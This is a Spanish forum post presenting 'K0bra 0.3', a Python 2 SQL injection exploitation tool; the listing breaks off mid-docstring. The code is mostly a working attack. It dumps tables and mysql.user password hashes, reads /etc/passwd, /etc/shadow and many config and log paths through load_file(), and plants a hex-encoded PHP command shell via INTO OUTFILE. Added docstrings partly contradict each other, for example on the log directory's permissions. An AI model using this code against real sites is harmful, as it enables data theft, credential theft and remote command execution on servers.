



Título: [Python] K0bra 0.3
Publicado por: BigBear en 3 Diciembre 2011, 16:35 pm
Un completo scanner SQLI hecho en python

Las funciones son las siguientes

  • Comprobar vulnerabilidad
  • Buscar número de columnas
  • Buscar automáticamente el número para mostrar datos
  • Mostrar tablas
  • Mostrar columnas
  • Mostrar bases de datos
  • Mostrar tablas de otra DB
  • Mostrar columnas de una tabla de otra DB
  • Mostrar usuarios de mysql.user
  • Buscar archivos usando load_file
  • Mostrar un archivo usando load_file
  • Mostrar valores
  • Mostrar información sobre la DB
  • Crear una shell usando outfile
  • Todo se guarda en logs ordenados
  • Manejo de control+c
Código
  1. #!usr/bin/python
  2. #k0bra 0.3 (C) Doddy Hackman 2011
  3.  
  4. import os,sys,urllib2,re,binascii
  5. from urlparse import urlparse
  6.  
# Candidate paths that fuzz() tries one by one through load_file().  Each entry
# is hex-encoded (binascii.hexlify) before it is placed in the request, so these
# literals never appear verbatim on the wire; the list also holds a duplicate
# ("C:/xampp/htdocs/aca.txt" appears twice).
files = ["/etc/passwd","C:/xampp/htdocs/aca.txt","C:/xampp/htdocs/aca.txt","C:/xampp/htdocs/admin.php","C:/xampp/htdocs/leer.txt","../../../boot.ini","../../../../boot.ini","../../../../../boot.ini","../../../../../../boot.ini","/etc/shadow","/etc/shadow~","/etc/hosts","/etc/motd","/etc/apache/apache.conf","/etc/fstab","/etc/apache2/apache2.conf","/etc/apache/httpd.conf","/etc/httpd/conf/httpd.conf","/etc/apache2/httpd.conf","/etc/apache2/sites-available/default","/etc/mysql/my.cnf","/etc/my.cnf","/etc/sysconfig/network-scripts/ifcfg-eth0","/etc/redhat-release","/etc/httpd/conf.d/php.conf","/etc/pam.d/proftpd","/etc/phpmyadmin/config.inc.php","/var/www/config.php","/etc/httpd/logs/error_log","/etc/httpd/logs/error.log","/etc/httpd/logs/access_log","/etc/httpd/logs/access.log","/var/log/apache/error_log","/var/log/apache/error.log","/var/log/apache/access_log","/var/log/apache/access.log","/var/log/apache2/error_log","/var/log/apache2/error.log","/var/log/apache2/access_log","/var/log/apache2/access.log","/var/www/logs/error_log","/var/www/logs/error.log","/var/www/logs/access_log","/var/www/logs/access.log","/usr/local/apache/logs/error_log","/usr/local/apache/logs/error.log","/usr/local/apache/logs/access_log","/usr/local/apache/logs/access.log","/var/log/error_log","/var/log/error.log","/var/log/access_log","/var/log/access.log","/etc/group","/etc/security/group","/etc/security/passwd","/etc/security/user","/etc/security/environ","/etc/security/limits","/usr/lib/security/mkuser.default","/apache/logs/access.log","/apache/logs/error.log","/etc/httpd/logs/acces_log","/etc/httpd/logs/acces.log","/var/log/httpd/access_log","/var/log/httpd/error_log","/apache2/logs/error.log","/apache2/logs/access.log","/logs/error.log","/logs/access.log","/usr/local/apache2/logs/access_log","/usr/local/apache2/logs/access.log","/usr/local/apache2/logs/error_log","/usr/local/apache2/logs/error.log","/var/log/httpd/access.log","/var/log/httpd/error.log","/opt/lampp/logs/access_log"
,"/opt/lampp/logs/error_log","/opt/xampp/logs/access_log","/opt/xampp/logs/error_log","/opt/lampp/logs/access.log","/opt/lampp/logs/error.log","/opt/xampp/logs/access.log","/opt/xampp/logs/error.log","C:\\ProgramFiles\\ApacheGroup\\Apache\\logs\\access.log","C:\\ProgramFiles\\ApacheGroup\\Apache\\logs\\error.log","/usr/local/apache/conf/httpd.conf","/usr/local/apache2/conf/httpd.conf","/etc/apache/conf/httpd.conf","/usr/local/etc/apache/conf/httpd.conf","/usr/local/apache/httpd.conf","/usr/local/apache2/httpd.conf","/usr/local/httpd/conf/httpd.conf","/usr/local/etc/apache2/conf/httpd.conf","/usr/local/etc/httpd/conf/httpd.conf","/usr/apache2/conf/httpd.conf","/usr/apache/conf/httpd.conf","/usr/local/apps/apache2/conf/httpd.conf","/usr/local/apps/apache/conf/httpd.conf","/etc/apache2/conf/httpd.conf","/etc/http/conf/httpd.conf","/etc/httpd/httpd.conf","/etc/http/httpd.conf","/etc/httpd.conf","/opt/apache/conf/httpd.conf","/opt/apache2/conf/httpd.conf","/var/www/conf/httpd.conf","/private/etc/httpd/httpd.conf","/private/etc/httpd/httpd.conf.default","/Volumes/webBackup/opt/apache2/conf/httpd.conf","/Volumes/webBackup/private/etc/httpd/httpd.conf","/Volumes/webBackup/private/etc/httpd/httpd.conf.default","C:\\ProgramFiles\\ApacheGroup\\Apache\\conf\\httpd.conf","C:\\ProgramFiles\\ApacheGroup\\Apache2\\conf\\httpd.conf","C:\\ProgramFiles\\xampp\\apache\\conf\\httpd.conf","/usr/local/php/httpd.conf.php","/usr/local/php4/httpd.conf.php","/usr/local/php5/httpd.conf.php","/usr/local/php/httpd.conf","/usr/local/php4/httpd.conf","/usr/local/php5/httpd.conf","/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf","/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf","/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf","/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php","/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php","/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php","/usr/local/etc/apache/vhosts.conf","/etc/php.ini","/bin/php.ini","/etc/httpd/php.ini","/usr/lib/php.ini",
"/usr/lib/php/php.ini","/usr/local/etc/php.ini","/usr/local/lib/php.ini","/usr/local/php/lib/php.ini","/usr/local/php4/lib/php.ini","/usr/local/php5/lib/php.ini","/usr/local/apache/conf/php.ini","/etc/php4.4/fcgi/php.ini","/etc/php4/apache/php.ini","/etc/php4/apache2/php.ini","/etc/php5/apache/php.ini","/etc/php5/apache2/php.ini","/etc/php/php.ini","/etc/php/php4/php.ini","/etc/php/apache/php.ini","/etc/php/apache2/php.ini","/web/conf/php.ini","/usr/local/Zend/etc/php.ini","/opt/xampp/etc/php.ini","/var/local/www/conf/php.ini","/etc/php/cgi/php.ini","/etc/php4/cgi/php.ini","/etc/php5/cgi/php.ini","c:\\php5\\php.ini","c:\\php4\\php.ini","c:\\php\\php.ini","c:\\PHP\\php.ini","c:\\WINDOWS\\php.ini","c:\\WINNT\\php.ini","c:\\apache\\php\\php.ini","c:\\xampp\\apache\\bin\\php.ini","c:\\NetServer\\bin\\stable\\apache\\php.ini","c:\\home2\\bin\\stable\\apache\\php.ini","c:\\home\\bin\\stable\\apache\\php.ini","/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini","/usr/local/cpanel/logs","/usr/local/cpanel/logs/stats_log","/usr/local/cpanel/logs/access_log","/usr/local/cpanel/logs/error_log","/usr/local/cpanel/logs/license_log","/usr/local/cpanel/logs/login_log","/var/cpanel/cpanel.config","/var/log/mysql/mysql-bin.log","/var/log/mysql.log","/var/log/mysqlderror.log","/var/log/mysql/mysql.log","/var/log/mysql/mysql-slow.log","/var/mysql.log","/var/lib/mysql/my.cnf","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\hostname.err","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql.log","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql.err","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql-bin.log","C:\\ProgramFiles\\MySQL\\data\\hostname.err","C:\\ProgramFiles\\MySQL\\data\\mysql.log","C:\\ProgramFiles\\MySQL\\data\\mysql.err","C:\\ProgramFiles\\MySQL\\data\\mysql-bin.log","C:\\MySQL\\data\\hostname.err","C:\\MySQL\\data\\mysql.log","C:\\MySQL\\data\\mysql.err","C:\\MySQL\\data\\mysql-bin.log","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\my.ini","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\my.cnf","C:\\ProgramFiles\\MySQL\\my.ini","C:\\ProgramFiles\\MySQL\\my.cnf","C:\\MySQL\\my.ini","C:\\MySQL\\my.cnf","/etc/logrotate.d/proftpd","/www/logs/proftpd.system.log","/var/log/proftpd","/etc/proftp.conf","/etc/protpd/proftpd.conf","/etc/vhcs2/proftpd/proftpd.conf","/etc/proftpd/modules.conf","/var/log/vsftpd.log","/etc/vsftpd.chroot_list","/etc/logrotate.d/vsftpd.log","/etc/vsftpd/vsftpd.conf","/etc/vsftpd.conf","/etc/chrootUsers","/var/log/xferlog","/var/adm/log/xferlog","/etc/wu-ftpd/ftpaccess","/etc/wu-ftpd/ftphosts","/etc/wu-ftpd/ftpusers","/usr/sbin/pure-config.pl","/usr/etc/pure-ftpd.conf","/etc/pure-ftpd/pure-ftpd.conf","/usr/local/etc/pure-ftpd.conf","/usr/local/etc/pureftpd.pdb","/usr/local/pureftpd/etc/pureftpd.pdb","/usr/local/pureftpd/sbin/pure-config.pl","/usr/local/pureftpd/etc/pure-ftpd.conf","/etc/pure-ftpd/pure-ftpd.pdb","/etc/pureftpd.pdb","/etc/pureftpd.passwd","/etc/pure-ftpd/pureftpd.pdb","/var/log/pure-ftpd/pure-ftpd.log","/logs/pure-ftpd.log","/var/log/pureftpd.log","/var/log/ftp-proxy/ftp-proxy.log","/var/log/ftp-proxy","/var/log/ftplog","/etc/logrotate.d/ftp","/etc/ftpchroot","/etc/ftphosts","/var/log/exim_mainlog","/var/log/exim/mainlog","/var/log/maillog","/var/log/exim_paniclog","/var/log/exim/paniclog","/var/log/exim/rejectlog","/var/log/exim_rejectlog"]
  8.  
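def installer():
    """Create the ``logs/`` directory that savefile() appends to.

    Succeeds silently when the directory already exists.  Any other OSError
    (read-only working directory, permission denied) is also swallowed so the
    original best-effort behaviour is kept; the failure then surfaces from the
    first savefile() call instead.
    """
    try:
        # 0o750 rather than the original 0777: the directory receives data
        # copied from the target host, so it must not be world-readable or
        # world-writable.
        os.mkdir("logs", 0o750)
    except OSError:
        pass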
  14.  
def clean():
    """Clear the terminal using the platform's own command (cls on Windows, clear elsewhere)."""
    command = "cls" if sys.platform == "win32" else "clear"
    os.system(command)
  20.  
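def savefile(name, text):
    """Append ``"\\n" + text`` to the file *name*, creating it if it does not exist.

    The handle is managed by a ``with`` block so it is closed even when the
    write raises, and the local no longer shadows the ``file`` builtin.
    """
    with open(name, "a") as handle:
        handle.write("\n" + text)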
  25.  
def gethost(test):
    """Return the network-location part (host, plus port if present) of URL *test*."""
    parsed = urlparse(test)
    return parsed.netloc
  28.  
def header():
    """Print the banner: two blank lines, the ASCII-art logo, two blank lines."""
    logo = (
        "",
        "",
        " @      @@   @   ",
        "@@     @  @ @@      ",
        " @ @@  @  @  @ @   @ @ @@@ ",
        " @ @   @  @  @@ @ @@@ @  @ ",
        " @@    @  @  @  @  @   @@@ ",
        " @ @   @  @  @  @  @  @  @ ",
        "@@@ @   @@   @@@  @@@ @@@@@",
        "",
        "",
    )
    # One write instead of eleven print statements; output is byte-identical.
    sys.stdout.write("\n".join(logo) + "\n")
  41.  
def copyright():
    """Print the (C) notice, preceded by two blank lines and followed by one."""
    notice = "\n\n(C) Doddy Hackman 2010\n"
    sys.stdout.write(notice + "\n")
  44.  
def show():
    """Print the usage line, naming the script via sys.argv[0].

    The double spaces reproduce the separators the original comma-style
    print emitted around the script name.
    """
    usage = "\n[*] Sintax :  %s  <web>\n\n" % sys.argv[0]
    sys.stdout.write(usage)
  47.  
def toma(web):
    """Fetch *web* and return the raw response body.

    Every request carries the same fixed, dated Firefox 3.0.5 User-Agent
    string; because it never varies, that header is a convenient fingerprint
    for identifying this tool's traffic in web-server logs.
    """
    agent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
    request = urllib2.Request(web)
    request.add_header("User-Agent", agent)
    response = urllib2.build_opener().open(request)
    return response.read()
  53.  
def bypass(bypass):
    """Map a comment-style selector to a (separator, terminator) pair.

    "/*" selects inline-comment padding ("/**/", "/**/"); "--" and any
    other value give the default ("+", "--").
    """
    styles = {
        "--": ("+", "--"),
        "/*": ("/**/", "/**/"),
    }
    return styles.get(bypass, ("+", "--"))
  61.  
def reiniciar():
    """Show the copyright notice, wait for Enter, then restart the prompt loop via sta()."""
    for step in (copyright, raw_input, sta):
        step()
  66.  
def dumper(web,passx,table,col1,col2):
 """Read *col1* and *col2* from *table* one row at a time (``limit N,1``) and
 write each pair to stdout and logs/<host>.txt.

 *web* must contain the placeholder ``hackman``, which re.sub() replaces with
 the injected expression.  The constants 0x4b30425241 and 0x4B3042524131 are
 the hex spellings of the delimiters K0BRA and K0BRA1 that the regexes below
 pull out of the response; those markers and the ``unhex(hex(concat(`` wrapper
 are identical in every request this file sends, which makes them a reliable
 WAF/IDS signature.
 """
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web)
 code1 = toma(web1+pass1+"from"+pass1+table+pass2)
 print "\n\n[+] Searching values\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  # Empty write first: creates the log file if it is not there yet.
  savefile("logs/"+gethost(web)+".txt","")
  savefile("logs/"+gethost(web)+".txt","[+] Values Found in table "+table+" : "+numbers+"\n")
  print "[+] Values Found : ",numbers,"\n"
  # int() raises ValueError if the echoed count is not numeric; the bare
  # except in menu() swallows it and redraws the menu.
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    c1 = re.findall("K0BRA(.*?)K0BRA",code2)
    c1 = c1[0]
    c2 = re.findall("K0BRA1(.*?)K0BRA1",code2)
    c2 = c2[0]
    print "["+col1+"] : "+c1
    print "["+col2+"] : "+c2+"\n"
    savefile("logs/"+gethost(web)+".txt","["+col1+"] : "+c1)
    savefile("logs/"+gethost(web)+".txt","["+col2+"] : "+c2+"\n")
 else:
  print "[-] Not Found\n"
  93.  
def mysqluser(web,passx):
 """List Host/User/Password rows of mysql.user through the ``hackman``
 placeholder in *web*, echoing each row to stdout and logs/<host>.txt.

 0x4b30425241 / 0x4B3042524131 / 0x4B3042524132 are the hex forms of the
 delimiters K0BRA, K0BRA1 and K0BRA2 matched below.  Whatever the Password
 column holds is written unmodified to the log file, and installer() creates
 the logs/ directory with mode 0777, so that file deserves the same handling
 as any other credential store.
 """
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
 print "\n\n[+] Searching mysql.user\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] mysql.user : ON"
  savefile("logs/"+gethost(web)+".txt","")
  savefile("logs/"+gethost(web)+".txt","[+] mysql.user : ON")
  savefile("logs/"+gethost(web)+".txt","[+] Users Found : "+numbers+"\n")
  print "[+] Users Found : ",numbers,"\n"
  # int() raises ValueError on a non-numeric echo; menu()'s bare except swallows it.
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    host = re.findall("K0BRA(.*?)K0BRA",code2)
    host = host[0]
    user = re.findall("K0BRA1(.*?)K0BRA1",code2)
    user = user[0]
    passw = re.findall("K0BRA2(.*?)K0BRA2",code2)
    passw = passw[0]
    savefile("logs/"+gethost(web)+".txt","[Host] : "+host)
    savefile("logs/"+gethost(web)+".txt","[User] : "+user)
    savefile("logs/"+gethost(web)+".txt","[Pass] : "+passw+"\n")
    print "[Host] : "+host
    print "[User] : "+user
    print "[Pass] : "+passw+"\n"
 else:
  print "[-] Not Found\n"
  125.  
  126.  
def showcolumnsdb(web,db,table,passx):
 """List the columns of *table* in schema *db* via information_schema.columns.

 *db* and *table* are sent as 0x-prefixed hex literals (binascii.hexlify) so
 no quote characters are needed in the request.  Output goes to stdout and
 logs/<host>.txt; the delimiter regex is the same K0BRA marker used elsewhere.
 """
 # db2 is kept for the log line, but that line below uses table2 twice and
 # db2 is never read.
 db2 = db
 table2 = table
 db = "0x"+str(binascii.hexlify(db))
 table = "0x"+str(binascii.hexlify(table))
 pass1,pass2 = bypass(passx)
 savefile("logs/"+gethost(web)+".txt","")
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2)
 print "\n\n[+] Searching columns in DB\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] Columns Found : ",numbers,"\n"
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    column = re.findall("K0BRA(.*?)K0BRA",code2)
    column = column[0]
    savefile("logs/"+gethost(web)+".txt","[Column Found in table "+table2+" in DB "+table2+"] : "+column)
    print "[Column Found] : "+column
 else:
  print "[-] Not Found\n"
  152.  
  153.  
def showtablesdb(web,db,passx):
 """List the tables of schema *db* via information_schema.tables.

 *db* is sent as a 0x-prefixed hex literal; the original spelling (db2) is
 kept only for the log line.  Results go to stdout and logs/<host>.txt.
 """
 db2 = db
 db = "0x"+str(binascii.hexlify(db))
 pass1,pass2 = bypass(passx)
 savefile("logs/"+gethost(web)+".txt","")
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2)
 print "\n\n[+] Searching tables in DB\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] Tables Found : ",numbers,"\n"
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    table = re.findall("K0BRA(.*?)K0BRA",code2)
    table = table[0]
    print "[Table Found] : "+table
    savefile("logs/"+gethost(web)+".txt","[Table Found in DB "+db2+"] : "+table)
 else:
  print "[-] Not Found\n"
  177.  
def showtables(web,passx):
 """List table names from information_schema.tables (all schemas), writing
 them to stdout and logs/<host>.txt.

 Unlike the sibling show* functions this loop starts at offset 17 instead of
 0, so the first seventeen rows are never requested; the reason is not stated
 in the file.
 """
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
 print "\n\n[+] Searching tables\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  savefile("logs/"+gethost(web)+".txt","")
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] Tables Found : ",numbers,"\n"
  for counter in range(17,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    table = re.findall("K0BRA(.*?)K0BRA",code2)
    table = table[0]
    print "[Table Found] : "+table
    savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
 else:
  print "[-] Not Found\n"
  199.  
def showcolumns(tabla,web,passx):
 """List the columns of *tabla* via information_schema.columns (any schema).

 Note the parameter order differs from the other show* functions: the table
 name comes first, then *web*.  *tabla* is sent as a 0x-prefixed hex literal;
 tabla2 keeps the readable name for output.  Results go to stdout and
 logs/<host>.txt.
 """
 pass1,pass2 = bypass(passx)
 tabla2 = tabla
 tabla = "0x"+str(binascii.hexlify(tabla))
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2)
 print "\n\n[+] Searching columns\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  savefile("logs/"+gethost(web)+".txt","")
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] Columns Found : ",numbers,"\n"
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    column = re.findall("K0BRA(.*?)K0BRA",code2)
    column = column[0]
    print "[Column Found in table "+tabla2+"] : "+column
    savefile("logs/"+gethost(web)+".txt","[Column Found in table "+tabla2+"] : "+column)
 else:
  print "[-] Not Found\n"
  223.  
  224.  
def showdbs(web,passx):
 """List schema names from information_schema.schemata, one request per row,
 writing them to stdout and logs/<host>.txt.

 Same request shape and K0BRA delimiters as the other show* functions.
 """
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
 print "\n\n[+] Searching DBS\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  savefile("logs/"+gethost(web)+".txt","")
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] DBS Found : ",numbers,"\n"
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    db = re.findall("K0BRA(.*?)K0BRA",code2)
    db = db[0]
    print "[DB Found] : "+db
    savefile("logs/"+gethost(web)+".txt","[DB Found] : "+db)
 else:
  print "[-] Not Found\n"
  246.  
def men():
 """Pause ("press any key") and return to the menu.

 ``page`` is not bound anywhere in this file (it is a parameter of menu()),
 so the last line raises NameError; ``bypass`` here is the module-level
 function, not menu()'s argument.  Because men() is only ever called from
 inside menu()'s try block, the bare except there catches the error and
 calls menu(page,bypass) itself -- the menu is redrawn, but by accident.
 """
 print "\n[+] Press any key to continue\n"
 raw_input()
 menu(page,bypass)
  251.  
def fuzz(web,bypassx):
 """Try every path in the module-level ``files`` list through load_file() and
 print/log the content of any that is echoed back.

 Each path is hex-encoded before use.  The response is delimited by
 char(107,48,98,114,97) -- the lower-case marker "k0bra" matched below with
 re.S so multi-line file contents are captured.  pass1/pass2 are computed but
 not used here.  File contents are appended verbatim to logs/<host>.txt.
 """
 print "\n[+] Fuzzing files with load_file()\n"
 pass1,pass2 = bypass(bypassx)
 for archivos in files:
  nombre = archivos
  # Shadows the ``file`` builtin; harmless here because the builtin is never used.
  file = "0x"+str(binascii.hexlify(archivos))
  web1 = re.sub("hackman","unhex(hex(concat(char(107,48,98,114,97),load_file("+file+"),char(107,48,98,114,97))))",web)

  code = toma(web1)

  if (re.findall("k0bra(.*?)k0bra",code,re.S)):
   algo = re.findall("k0bra(.*?)k0bra",code,re.S)
   print "\n[File Found] : ",nombre
   print "\n[Source Start]\n"
   print algo[0]
   print "\n[Source End]"
   savefile("logs/"+gethost(web)+".txt","\n[File Found] : "+nombre)
   savefile("logs/"+gethost(web)+".txt","\n[Source Start]\n")
   savefile("logs/"+gethost(web)+".txt",algo[0])
   savefile("logs/"+gethost(web)+".txt","\n[Source End]")
 print "\n[+] Finished\n"
  273.  
def fuzzfile(web,bypassx):
 """Single-path variant of fuzz(): prompt for one file name, request it
 through load_file() and print/log whatever is echoed between the "k0bra"
 markers.

 The prompt value is hex-encoded without any validation.  pass1/pass2 are
 computed but unused.
 """
 pass1,pass2 = bypass(bypassx)
 archivos = raw_input("\n[File To load] : ")
 nombre = archivos
 file = "0x"+str(binascii.hexlify(archivos))
 web1 = re.sub("hackman","unhex(hex(concat(char(107,48,98,114,97),load_file("+file+"),char(107,48,98,114,97))))",web)

 code = toma(web1)

 if (re.findall("k0bra(.*?)k0bra",code,re.S)):
  algo = re.findall("k0bra(.*?)k0bra",code,re.S)
  print "\n\n[File Found] : ",nombre
  print "\n[Source Start]\n"
  print algo[0]
  print "\n[Source End]"
  savefile("logs/"+gethost(web)+".txt","\n[File Found] : "+nombre)
  savefile("logs/"+gethost(web)+".txt","\n[Source Start]\n")
  savefile("logs/"+gethost(web)+".txt",algo[0])
  savefile("logs/"+gethost(web)+".txt","\n[Source End]")
 else:
  print "\n\n[-] Error"
  295.  
def into(web,passx):
 """Write a file to the target via ``INTO OUTFILE`` and check whether it is
 reachable over HTTP.

 Two prompts: *dira* is the server-side directory the file is written to,
 *diro* the web path it is then requested from; both get "/cmd.php"
 appended and neither is validated.  The success test is the literal
 "Mini Shell By Doddy" in the fetched page.
 """
 pass1,pass2 = bypass(passx)
 dira = raw_input("\n\n[Full Source Discloure] : ")
 diro = raw_input("\n[Directory to test] : ")

 # Hex-encoded PHP source.  Its <title> is the "Mini Shell By Doddy" string
 # checked below, so both this literal and that title identify the written
 # file on disk and in web logs.
 linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
 lugar = dira+"/cmd.php"
 lugardos = diro+"/cmd.php"
 webtest = "http://"+gethost(web)+lugardos
 web1 = re.sub("hackman",linea,web)
 formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2
 toma(formandoweb)
 code = toma(webtest)
 if (re.findall("Mini Shell By Doddy",code)):
  print "\n\n[shell up] : "+webtest
  savefile("logs/"+gethost(web)+".txt","\n[shell up] : "+webtest)
 else:
  print "\n\n[-] Error"
  314.  
  315.  
def menu(page,bypass):
 """Interactive main menu for a target URL *page* (which must already contain
 the ``hackman`` placeholder) and comment style *bypass*.

 The parameter ``bypass`` shadows the module-level function of the same
 name; inside this function it is only ever passed on as the ``passx``
 argument of the helpers, so the shadowing has no effect.

 Control flow: every branch ends in men(), menu(), sta() or sys.exit(), and
 the whole body sits inside a bare ``except:`` that simply calls menu() again.
 In Python 2 that bare except also catches KeyboardInterrupt (the file's
 "Ctrl+C handling") and SystemExit, so option 14 does not actually exit --
 the SystemExit raised by sys.exit(1) is swallowed and the menu is redrawn.
 """
 clean()
 header()
 print "\n[+] Target : ",page,"\n"
 print "\n[information_schema]\n"
 print "1 - Show tables"
 print "2 - Show columns of the a table"
 print "3 - Show databases"
 print "4 - Show tables from the a DB"
 print "5 - Show columns from the a table of the DB"
 print "\n[mysql.user]\n"
 print "6 - Show users"
 print "\n[Others]\n"
 print "7 - Show details"
 print "8 - Dump data"
 print "9 - Fuzz Files with load_file"
 print "10 - Load files with load_file"
 print "11 - Create Shell"
 print "12 - Show log"
 print "13 - Change target"
 print "14 - Exit\n\n"


 try:

  # Python 2 input() evaluates the typed text as an expression (eval); every
  # other prompt in this file uses raw_input().  Anything that is not a bare
  # integer either lands in the else branch or raises into the except below.
  op = input("[Option] : ")

  if op == 1:
   showtables(page,bypass)
   men()
  elif op == 2:
   table = raw_input("\n\n[Table] : ")
   showcolumns(table,page,bypass)
   men()
  elif op == 3:
   showdbs(page,bypass)
   men()
  elif op == 4:
   db = raw_input("\n\n[DB] : ")
   showtablesdb(page,db,bypass)
   men()
  elif op == 5:
   db = raw_input("\n\n[DB] : ")
   table = raw_input("\n\n[Table] : ")
   showcolumnsdb(page,db,table,bypass)
   men()
  elif op == 6:
   mysqluser(page,bypass)
   men()
  elif op == 7:
   more(page,bypass)
   men()
  elif op == 8:

   table = raw_input("\n\n[Table] : ")
   col1 = raw_input("\n\n[Column 1] : ")
   col2 = raw_input("\n\n[Column 2] : ")
   dumper(page,bypass,table,col1,col2)
   men()

  elif op == 9:
   fuzz(page,bypass)
   men()
  elif op == 10:
   fuzzfile(page,bypass)
   men()
  elif op == 11:
   into(page,bypass)
   men()
  elif op == 12:
   # "start" is a Windows cmd.exe builtin; the host name from the URL is
   # interpolated into a shell string here.
   os.system("start logs/"+gethost(page)+".txt")
   menu(page,bypass)
  elif op == 13:
   sta()
  elif op == 14:
   sys.exit(1)
  else:
   menu(page,bypass)
 except:
  menu(page,bypass)
  396.  
def more(web,passx):
 """Collect user(), database() and version(), then probe whether mysql.user,
 information_schema.tables and load_file() respond; print and log each.

